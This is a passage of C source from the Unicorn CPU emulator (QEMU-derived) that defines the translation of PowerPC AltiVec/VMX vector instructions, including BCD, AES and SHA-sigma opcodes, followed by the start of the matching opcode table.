rb; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_gpr[rD(ctx->opcode)], rb); \ tcg_temp_free_ptr(tcg_ctx, rb); \ } GEN_VXFORM_NOA(vupkhsb, 7, 8); GEN_VXFORM_NOA(vupkhsh, 7, 9); GEN_VXFORM_NOA(vupkhsw, 7, 25); GEN_VXFORM_NOA(vupklsb, 7, 10); GEN_VXFORM_NOA(vupklsh, 7, 11); GEN_VXFORM_NOA(vupklsw, 7, 27); GEN_VXFORM_NOA(vupkhpx, 7, 13); GEN_VXFORM_NOA(vupklpx, 7, 15); GEN_VXFORM_NOA_ENV(vrefp, 5, 4); GEN_VXFORM_NOA_ENV(vrsqrtefp, 5, 5); GEN_VXFORM_NOA_ENV(vexptefp, 5, 6); GEN_VXFORM_NOA_ENV(vlogefp, 5, 7); GEN_VXFORM_NOA_ENV(vrfim, 5, 11); GEN_VXFORM_NOA_ENV(vrfin, 5, 8); GEN_VXFORM_NOA_ENV(vrfip, 5, 10); GEN_VXFORM_NOA_ENV(vrfiz, 5, 9); GEN_VXFORM_NOA(vprtybw, 1, 24); GEN_VXFORM_NOA(vprtybd, 1, 24); GEN_VXFORM_NOA(vprtybq, 1, 24); static void gen_vsplt(DisasContext *ctx, int vece) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int uimm, dofs, bofs; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } uimm = UIMM5(ctx->opcode); bofs = avr_full_offset(rB(ctx->opcode)); dofs = avr_full_offset(rD(ctx->opcode)); /* Experimental testing shows that hardware masks the immediate. 
*/ bofs += (uimm << vece) & 15; #ifndef HOST_WORDS_BIGENDIAN bofs ^= 15; bofs &= ~((1 << vece) - 1); #endif tcg_gen_gvec_dup_mem(tcg_ctx, vece, dofs, bofs, 16, 16); } #define GEN_VXFORM_VSPLT(name, vece, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) { gen_vsplt(ctx, vece); } #define GEN_VXFORM_UIMM_ENV(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb, rd; \ TCGv_i32 uimm; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ uimm = tcg_const_i32(tcg_ctx, UIMM5(ctx->opcode)); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, rd, rb, uimm); \ tcg_temp_free_i32(tcg_ctx, uimm); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } #define GEN_VXFORM_UIMM_SPLAT(name, opc2, opc3, splat_max) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rb, rd; \ uint8_t uimm = UIMM4(ctx->opcode); \ TCGv_i32 t0; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ if (uimm > splat_max) { \ uimm = 0; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ tcg_gen_movi_i32(tcg_ctx, t0, uimm); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ gen_helper_##name(tcg_ctx, rd, rb, t0); \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } GEN_VXFORM_VSPLT(vspltb, MO_8, 6, 8); GEN_VXFORM_VSPLT(vsplth, MO_16, 6, 9); GEN_VXFORM_VSPLT(vspltw, MO_32, 6, 10); GEN_VXFORM_UIMM_SPLAT(vextractub, 6, 8, 15); GEN_VXFORM_UIMM_SPLAT(vextractuh, 6, 9, 14); GEN_VXFORM_UIMM_SPLAT(vextractuw, 6, 10, 12); GEN_VXFORM_UIMM_SPLAT(vextractd, 6, 11, 8); GEN_VXFORM_UIMM_SPLAT(vinsertb, 6, 12, 15); GEN_VXFORM_UIMM_SPLAT(vinserth, 6, 13, 14); GEN_VXFORM_UIMM_SPLAT(vinsertw, 6, 14, 12); GEN_VXFORM_UIMM_SPLAT(vinsertd, 6, 15, 8); GEN_VXFORM_UIMM_ENV(vcfux, 5, 12); GEN_VXFORM_UIMM_ENV(vcfsx, 5, 13); GEN_VXFORM_UIMM_ENV(vctuxs, 5, 14); GEN_VXFORM_UIMM_ENV(vctsxs, 5, 15); GEN_VXFORM_DUAL(vspltb, PPC_ALTIVEC, PPC_NONE, vextractub, PPC_NONE, PPC2_ISA300); GEN_VXFORM_DUAL(vsplth, PPC_ALTIVEC, PPC_NONE, vextractuh, PPC_NONE, PPC2_ISA300); GEN_VXFORM_DUAL(vspltw, PPC_ALTIVEC, PPC_NONE, vextractuw, PPC_NONE, PPC2_ISA300); GEN_VXFORM_DUAL(vspltisb, PPC_ALTIVEC, PPC_NONE, vinsertb, PPC_NONE, PPC2_ISA300); GEN_VXFORM_DUAL(vspltish, PPC_ALTIVEC, PPC_NONE, vinserth, PPC_NONE, PPC2_ISA300); GEN_VXFORM_DUAL(vspltisw, PPC_ALTIVEC, PPC_NONE, vinsertw, PPC_NONE, PPC2_ISA300); static void gen_vsldoi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_ptr ra, rb, rd; TCGv_i32 sh; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); sh = tcg_const_i32(tcg_ctx, VSH(ctx->opcode)); gen_helper_vsldoi(tcg_ctx, rd, ra, rb, sh); tcg_temp_free_ptr(tcg_ctx, ra); tcg_temp_free_ptr(tcg_ctx, rb); tcg_temp_free_ptr(tcg_ctx, rd); tcg_temp_free_i32(tcg_ctx, sh); } #define GEN_VAFORM_PAIRED(name0, name1, opc2) \ static void glue(gen_, name0##_##name1)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb, rc, rd; \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rb 
= gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rc = gen_avr_ptr(tcg_ctx, rC(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ if (Rc(ctx->opcode)) { \ gen_helper_##name1(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb, rc); \ } else { \ gen_helper_##name0(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb, rc); \ } \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rc); \ tcg_temp_free_ptr(tcg_ctx, rd); \ } GEN_VAFORM_PAIRED(vmhaddshs, vmhraddshs, 16) static void gen_vmladduhm(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_ptr ra, rb, rc, rd; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); rc = gen_avr_ptr(tcg_ctx, rC(ctx->opcode)); rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); gen_helper_vmladduhm(tcg_ctx, rd, ra, rb, rc); tcg_temp_free_ptr(tcg_ctx, ra); tcg_temp_free_ptr(tcg_ctx, rb); tcg_temp_free_ptr(tcg_ctx, rc); tcg_temp_free_ptr(tcg_ctx, rd); } static void gen_vpermr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_ptr ra, rb, rc, rd; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); rc = gen_avr_ptr(tcg_ctx, rC(ctx->opcode)); rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); gen_helper_vpermr(tcg_ctx, tcg_ctx->cpu_env, rd, ra, rb, rc); tcg_temp_free_ptr(tcg_ctx, ra); tcg_temp_free_ptr(tcg_ctx, rb); tcg_temp_free_ptr(tcg_ctx, rc); tcg_temp_free_ptr(tcg_ctx, rd); } GEN_VAFORM_PAIRED(vmsumubm, vmsummbm, 18) GEN_VAFORM_PAIRED(vmsumuhm, vmsumuhs, 19) GEN_VAFORM_PAIRED(vmsumshm, vmsumshs, 20) GEN_VAFORM_PAIRED(vsel, vperm, 21) GEN_VAFORM_PAIRED(vmaddfp, vnmsubfp, 23) GEN_VXFORM_NOA(vclzb, 1, 28) GEN_VXFORM_NOA(vclzh, 1, 29) GEN_VXFORM_TRANS(vclzw, 1, 30) GEN_VXFORM_TRANS(vclzd, 1, 31) GEN_VXFORM_NOA_2(vnegw, 1, 24, 6) GEN_VXFORM_NOA_2(vnegd, 1, 24, 7) GEN_VXFORM_NOA_2(vextsb2w, 1, 24, 16) GEN_VXFORM_NOA_2(vextsh2w, 1, 24, 17) GEN_VXFORM_NOA_2(vextsb2d, 1, 24, 24) GEN_VXFORM_NOA_2(vextsh2d, 1, 24, 25) GEN_VXFORM_NOA_2(vextsw2d, 1, 24, 26) GEN_VXFORM_NOA_2(vctzb, 1, 24, 28) GEN_VXFORM_NOA_2(vctzh, 1, 24, 29) GEN_VXFORM_NOA_2(vctzw, 1, 24, 30) GEN_VXFORM_NOA_2(vctzd, 1, 24, 31) GEN_VXFORM_NOA_3(vclzlsbb, 1, 24, 0) GEN_VXFORM_NOA_3(vctzlsbb, 1, 24, 1) GEN_VXFORM_NOA(vpopcntb, 1, 28) GEN_VXFORM_NOA(vpopcnth, 1, 29) GEN_VXFORM_NOA(vpopcntw, 1, 30) GEN_VXFORM_NOA(vpopcntd, 1, 31) GEN_VXFORM_DUAL(vclzb, PPC_NONE, PPC2_ALTIVEC_207, \ vpopcntb, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vclzh, PPC_NONE, PPC2_ALTIVEC_207, \ vpopcnth, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vclzw, PPC_NONE, PPC2_ALTIVEC_207, \ vpopcntw, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vclzd, PPC_NONE, PPC2_ALTIVEC_207, \ vpopcntd, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM(vbpermd, 6, 23); GEN_VXFORM(vbpermq, 6, 21); GEN_VXFORM_TRANS(vgbbd, 6, 20); GEN_VXFORM(vpmsumb, 4, 16) GEN_VXFORM(vpmsumh, 4, 17) GEN_VXFORM(vpmsumw, 4, 18) GEN_VXFORM(vpmsumd, 4, 19) #define GEN_BCD(op) \ static void gen_##op(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rb, rd; \ TCGv_i32 ps; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ \ ps = tcg_const_i32(tcg_ctx, (ctx->opcode & 0x200) != 0); \ \ 
gen_helper_##op(tcg_ctx, cpu_crf[6], rd, ra, rb, ps); \ \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ tcg_temp_free_i32(tcg_ctx, ps); \ } #define GEN_BCD2(op) \ static void gen_##op(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr rd, rb; \ TCGv_i32 ps; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ \ rb = gen_avr_ptr(tcg_ctx, rB(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ \ ps = tcg_const_i32(tcg_ctx, (ctx->opcode & 0x200) != 0); \ \ gen_helper_##op(tcg_ctx, cpu_crf[6], rd, rb, ps); \ \ tcg_temp_free_ptr(tcg_ctx, rb); \ tcg_temp_free_ptr(tcg_ctx, rd); \ tcg_temp_free_i32(tcg_ctx, ps); \ } GEN_BCD(bcdadd) GEN_BCD(bcdsub) GEN_BCD2(bcdcfn) GEN_BCD2(bcdctn) GEN_BCD2(bcdcfz) GEN_BCD2(bcdctz) GEN_BCD2(bcdcfsq) GEN_BCD2(bcdctsq) GEN_BCD2(bcdsetsgn) GEN_BCD(bcdcpsgn); GEN_BCD(bcds); GEN_BCD(bcdus); GEN_BCD(bcdsr); GEN_BCD(bcdtrunc); GEN_BCD(bcdutrunc); static void gen_xpnd04_1(DisasContext *ctx) { switch (opc4(ctx->opcode)) { case 0: gen_bcdctsq(ctx); break; case 2: gen_bcdcfsq(ctx); break; case 4: gen_bcdctz(ctx); break; case 5: gen_bcdctn(ctx); break; case 6: gen_bcdcfz(ctx); break; case 7: gen_bcdcfn(ctx); break; case 31: gen_bcdsetsgn(ctx); break; default: gen_invalid(ctx); break; } } static void gen_xpnd04_2(DisasContext *ctx) { switch (opc4(ctx->opcode)) { case 0: gen_bcdctsq(ctx); break; case 2: gen_bcdcfsq(ctx); break; case 4: gen_bcdctz(ctx); break; case 6: gen_bcdcfz(ctx); break; case 7: gen_bcdcfn(ctx); break; case 31: gen_bcdsetsgn(ctx); break; default: gen_invalid(ctx); break; } } GEN_VXFORM_DUAL(vsubcuw, PPC_ALTIVEC, PPC_NONE, \ xpnd04_1, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubsws, PPC_ALTIVEC, PPC_NONE, \ xpnd04_2, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsububm, PPC_ALTIVEC, PPC_NONE, \ bcdadd, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vsububs, PPC_ALTIVEC, PPC_NONE, \ bcdadd, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vsubuhm, PPC_ALTIVEC, PPC_NONE, \ bcdsub, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vsubuhs, PPC_ALTIVEC, PPC_NONE, \ bcdsub, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vaddshs, PPC_ALTIVEC, PPC_NONE, \ bcdcpsgn, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubudm, PPC2_ALTIVEC_207, PPC_NONE, \ bcds, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubuwm, PPC_ALTIVEC, PPC_NONE, \ bcdus, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubsbs, PPC_ALTIVEC, PPC_NONE, \ bcdtrunc, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubuqm, PPC2_ALTIVEC_207, PPC_NONE, \ bcdtrunc, PPC_NONE, PPC2_ISA300) GEN_VXFORM_DUAL(vsubcuq, PPC2_ALTIVEC_207, PPC_NONE, \ bcdutrunc, PPC_NONE, PPC2_ISA300) static void gen_vsbox(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_ptr ra, rd; if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); gen_helper_vsbox(tcg_ctx, rd, ra); tcg_temp_free_ptr(tcg_ctx, ra); tcg_temp_free_ptr(tcg_ctx, rd); } GEN_VXFORM(vcipher, 4, 20) GEN_VXFORM(vcipherlast, 4, 20) GEN_VXFORM(vncipher, 4, 21) GEN_VXFORM(vncipherlast, 4, 21) GEN_VXFORM_DUAL(vcipher, PPC_NONE, PPC2_ALTIVEC_207, vcipherlast, PPC_NONE, PPC2_ALTIVEC_207) GEN_VXFORM_DUAL(vncipher, PPC_NONE, PPC2_ALTIVEC_207, vncipherlast, PPC_NONE, PPC2_ALTIVEC_207) #define VSHASIGMA(op) \ static void gen_##op(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr ra, rd; \ TCGv_i32 st_six; \ if 
(unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ ra = gen_avr_ptr(tcg_ctx, rA(ctx->opcode)); \ rd = gen_avr_ptr(tcg_ctx, rD(ctx->opcode)); \ st_six = tcg_const_i32(tcg_ctx, rB(ctx->opcode)); \ gen_helper_##op(tcg_ctx, rd, ra, st_six); \ tcg_temp_free_ptr(tcg_ctx, ra); \ tcg_temp_free_ptr(tcg_ctx, rd); \ tcg_temp_free_i32(tcg_ctx, st_six); \ } VSHASIGMA(vshasigmaw) VSHASIGMA(vshasigmad) GEN_VXFORM3(vpermxor, 22, 0xFF) GEN_VXFORM_DUAL(vsldoi, PPC_ALTIVEC, PPC_NONE, vpermxor, PPC_NONE, PPC2_ALTIVEC_207) #undef GEN_VR_LDX #undef GEN_VR_STX #undef GEN_VR_LVE #undef GEN_VR_STVE #undef GEN_VX_LOGICAL #undef GEN_VX_LOGICAL_207 #undef GEN_VXFORM #undef GEN_VXFORM_207 #undef GEN_VXFORM_DUAL #undef GEN_VXRFORM_DUAL #undef GEN_VXRFORM1 #undef GEN_VXRFORM #undef GEN_VXFORM_DUPI #undef GEN_VXFORM_NOA #undef GEN_VXFORM_UIMM #undef GEN_VAFORM_PAIRED #undef GEN_BCD2
unicorn-2.1.1/qemu/target/ppc/translate/vmx-ops.inc.c
#define GEN_VR_LDX(name, opc2, opc3) \ GEN_HANDLER(name, 0x1F, opc2, opc3, 0x00000001, PPC_ALTIVEC) #define GEN_VR_STX(name, opc2, opc3) \ GEN_HANDLER(st##name, 0x1F, opc2, opc3, 0x00000001, PPC_ALTIVEC) #define GEN_VR_LVE(name, opc2, opc3) \ GEN_HANDLER(lve##name, 0x1F, opc2, opc3, 0x00000001, PPC_ALTIVEC) #define GEN_VR_STVE(name, opc2, opc3) \ GEN_HANDLER(stve##name, 0x1F, opc2, opc3, 0x00000001, PPC_ALTIVEC) GEN_VR_LDX(lvx, 0x07, 0x03), GEN_VR_LDX(lvxl, 0x07, 0x0B), GEN_VR_LVE(bx, 0x07, 0x00), GEN_VR_LVE(hx, 0x07, 0x01), GEN_VR_LVE(wx, 0x07, 0x02), GEN_VR_STX(svx, 0x07, 0x07), GEN_VR_STX(svxl, 0x07, 0x0F), GEN_VR_STVE(bx, 0x07, 0x04), GEN_VR_STVE(hx, 0x07, 0x05), GEN_VR_STVE(wx, 0x07, 0x06), #define GEN_VX_LOGICAL(name, tcg_op, opc2, opc3) \ GEN_HANDLER(name, 0x04, opc2, opc3, 0x00000000, PPC_ALTIVEC) #define GEN_VX_LOGICAL_207(name, tcg_op, opc2, opc3) \ GEN_HANDLER_E(name, 0x04, opc2, opc3, 0x00000000, PPC_NONE, PPC2_ALTIVEC_207) GEN_VX_LOGICAL(vand, tcg_gen_and_i64, 2, 16), GEN_VX_LOGICAL(vandc, tcg_gen_andc_i64, 2, 17), GEN_VX_LOGICAL(vor, tcg_gen_or_i64, 2, 18), GEN_VX_LOGICAL(vxor, tcg_gen_xor_i64, 2, 19), GEN_VX_LOGICAL(vnor, tcg_gen_nor_i64, 2, 20), GEN_VX_LOGICAL_207(veqv, tcg_gen_eqv_i64, 2, 26), GEN_VX_LOGICAL_207(vnand, tcg_gen_nand_i64, 2, 22), GEN_VX_LOGICAL_207(vorc, tcg_gen_orc_i64, 2, 21), #define GEN_VXFORM(name, opc2, opc3) \ GEN_HANDLER(name, 0x04, opc2, opc3, 0x00000000, PPC_ALTIVEC) #define GEN_VXFORM_207(name, opc2, opc3) \ GEN_HANDLER_E(name, 0x04, opc2, opc3, 0x00000000, PPC_NONE, PPC2_ALTIVEC_207) #define GEN_VXFORM_300(name, opc2, opc3) \ GEN_HANDLER_E(name, 0x04, opc2, opc3, 0x00000000, PPC_NONE, PPC2_ISA300) #define GEN_VXFORM_300_EXT(name, opc2, opc3, inval) \ GEN_HANDLER_E(name, 0x04, opc2, opc3, inval, PPC_NONE, PPC2_ISA300) #define GEN_VXFORM_300_EO(name, opc2, opc3, opc4) \ 
GEN_HANDLER_E_2(name, 0x04, opc2, opc3, opc4, 0x00000000, PPC_NONE, \ PPC2_ISA300) #define GEN_VXFORM_DUAL(name0, name1, opc2, opc3, type0, type1) \ GEN_HANDLER_E(name0##_##name1, 0x4, opc2, opc3, 0x00000000, type0, type1) #define GEN_VXRFORM_DUAL(name0, name1, opc2, opc3, tp0, tp1) \ GEN_HANDLER_E(name0##_##name1, 0x4, opc2, opc3, 0x00000000, tp0, tp1), \ GEN_HANDLER_E(name0##_##name1, 0x4, opc2, (opc3 | 0x10), 0x00000000, tp0, tp1), GEN_VXFORM_DUAL(vaddubm, vmul10cuq, 0, 0, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vadduhm, vmul10ecuq, 0, 1, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vadduwm, 0, 2), GEN_VXFORM_207(vaddudm, 0, 3), GEN_VXFORM_DUAL(vsububm, bcdadd, 0, 16, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vsubuhm, bcdsub, 0, 17, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vsubuwm, bcdus, 0, 18, PPC_ALTIVEC, PPC2_ISA300), GEN_VXFORM_DUAL(vsubudm, bcds, 0, 19, PPC2_ALTIVEC_207, PPC2_ISA300), GEN_VXFORM_300(bcds, 0, 27), GEN_VXFORM(vmaxub, 1, 0), GEN_VXFORM(vmaxuh, 1, 1), GEN_VXFORM(vmaxuw, 1, 2), GEN_VXFORM_207(vmaxud, 1, 3), GEN_VXFORM(vmaxsb, 1, 4), GEN_VXFORM(vmaxsh, 1, 5), GEN_VXFORM(vmaxsw, 1, 6), GEN_VXFORM_207(vmaxsd, 1, 7), GEN_VXFORM(vminub, 1, 8), GEN_VXFORM(vminuh, 1, 9), GEN_VXFORM(vminuw, 1, 10), GEN_VXFORM_207(vminud, 1, 11), GEN_VXFORM(vminsb, 1, 12), GEN_VXFORM(vminsh, 1, 13), GEN_VXFORM(vminsw, 1, 14), GEN_VXFORM_207(vminsd, 1, 15), GEN_VXFORM_DUAL(vavgub, vabsdub, 1, 16, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vavguh, vabsduh, 1, 17, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vavguw, vabsduw, 1, 18, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vavgsb, 1, 20), GEN_VXFORM(vavgsh, 1, 21), GEN_VXFORM(vavgsw, 1, 22), GEN_VXFORM(vmrghb, 6, 0), GEN_VXFORM(vmrghh, 6, 1), GEN_VXFORM(vmrghw, 6, 2), GEN_VXFORM(vmrglb, 6, 4), GEN_VXFORM(vmrglh, 6, 5), GEN_VXFORM(vmrglw, 6, 6), GEN_VXFORM_300(vextublx, 6, 24), GEN_VXFORM_300(vextuhlx, 6, 25), GEN_VXFORM_DUAL(vmrgow, vextuwlx, 6, 26, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_300(vextubrx, 6, 28), GEN_VXFORM_300(vextuhrx, 6, 29), GEN_VXFORM_DUAL(vmrgew, vextuwrx, 6, 30, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM(vmuloub, 4, 0), GEN_VXFORM(vmulouh, 4, 1), GEN_VXFORM_DUAL(vmulouw, vmuluwm, 4, 2, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vmulosb, 4, 4), GEN_VXFORM(vmulosh, 4, 5), GEN_VXFORM_207(vmulosw, 4, 6), GEN_VXFORM(vmuleub, 4, 8), GEN_VXFORM(vmuleuh, 4, 9), GEN_VXFORM_207(vmuleuw, 4, 10), GEN_VXFORM(vmulesb, 4, 12), GEN_VXFORM(vmulesh, 4, 13), GEN_VXFORM_207(vmulesw, 4, 14), GEN_VXFORM(vslb, 2, 4), GEN_VXFORM(vslh, 2, 5), GEN_VXFORM_DUAL(vslw, vrlwnm, 2, 6, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_207(vsld, 2, 23), GEN_VXFORM(vsrb, 2, 8), GEN_VXFORM(vsrh, 2, 9), GEN_VXFORM(vsrw, 2, 10), GEN_VXFORM_207(vsrd, 2, 27), GEN_VXFORM(vsrab, 2, 12), GEN_VXFORM(vsrah, 2, 13), GEN_VXFORM(vsraw, 2, 14), GEN_VXFORM_207(vsrad, 2, 15), GEN_VXFORM_300(vsrv, 2, 28), GEN_VXFORM_300(vslv, 2, 29), GEN_VXFORM(vslo, 6, 16), GEN_VXFORM(vsro, 6, 17), GEN_VXFORM(vaddcuw, 0, 6), GEN_HANDLER_E_2(vprtybw, 0x4, 0x1, 0x18, 8, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E_2(vprtybd, 0x4, 0x1, 0x18, 9, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E_2(vprtybq, 0x4, 0x1, 0x18, 10, 0, PPC_NONE, PPC2_ISA300), GEN_VXFORM_DUAL(vsubcuw, xpnd04_1, 0, 22, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_300(bcdsr, 0, 23), GEN_VXFORM_300(bcdsr, 0, 31), GEN_VXFORM_DUAL(vaddubs, vmul10uq, 0, 8, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vadduhs, vmul10euq, 0, 9, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vadduws, 0, 10), GEN_VXFORM(vaddsbs, 0, 12), GEN_VXFORM_DUAL(vaddshs, bcdcpsgn, 0, 13, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vaddsws, 0, 14), 
GEN_VXFORM_DUAL(vsububs, bcdadd, 0, 24, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vsubuhs, bcdsub, 0, 25, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vsubuws, 0, 26), GEN_VXFORM_DUAL(vsubsbs, bcdtrunc, 0, 28, PPC_ALTIVEC, PPC2_ISA300), GEN_VXFORM(vsubshs, 0, 29), GEN_VXFORM_DUAL(vsubsws, xpnd04_2, 0, 30, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_207(vadduqm, 0, 4), GEN_VXFORM_207(vaddcuq, 0, 5), GEN_VXFORM_DUAL(vaddeuqm, vaddecuq, 30, 0xFF, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vsubuqm, bcdtrunc, 0, 20, PPC2_ALTIVEC_207, PPC2_ISA300), GEN_VXFORM_DUAL(vsubcuq, bcdutrunc, 0, 21, PPC2_ALTIVEC_207, PPC2_ISA300), GEN_VXFORM_DUAL(vsubeuqm, vsubecuq, 31, 0xFF, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM(vrlb, 2, 0), GEN_VXFORM(vrlh, 2, 1), GEN_VXFORM_DUAL(vrlw, vrlwmi, 2, 2, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM_DUAL(vrld, vrldmi, 2, 3, PPC_NONE, PPC2_ALTIVEC_207), GEN_VXFORM_DUAL(vsl, vrldnm, 2, 7, PPC_ALTIVEC, PPC_NONE), GEN_VXFORM(vsr, 2, 11), GEN_VXFORM(vpkuhum, 7, 0), GEN_VXFORM(vpkuwum, 7, 1), GEN_VXFORM_207(vpkudum, 7, 17), GEN_VXFORM(vpkuhus, 7, 2), GEN_VXFORM(vpkuwus, 7, 3), GEN_VXFORM_207(vpkudus, 7, 19), GEN_VXFORM(vpkshus, 7, 4), GEN_VXFORM(vpkswus, 7, 5), GEN_VXFORM_207(vpksdus, 7, 21), GEN_VXFORM(vpkshss, 7, 6), GEN_VXFORM(vpkswss, 7, 7), GEN_VXFORM_207(vpksdss, 7, 23), GEN_VXFORM(vpkpx, 7, 12), GEN_VXFORM(vsum4ubs, 4, 24), GEN_VXFORM(vsum4sbs, 4, 28), GEN_VXFORM(vsum4shs, 4, 25), GEN_VXFORM(vsum2sws, 4, 26), GEN_VXFORM(vsumsws, 4, 30), GEN_VXFORM(vaddfp, 5, 0), GEN_VXFORM(vsubfp, 5, 1), GEN_VXFORM(vmaxfp, 5, 16), GEN_VXFORM(vminfp, 5, 17), #define GEN_VXRFORM1(opname, name, str, opc2, opc3) \ GEN_HANDLER2(name, str, 0x4, opc2, opc3, 0x00000000, PPC_ALTIVEC), #define GEN_VXRFORM1_300(opname, name, str, opc2, opc3) \ GEN_HANDLER2_E(name, str, 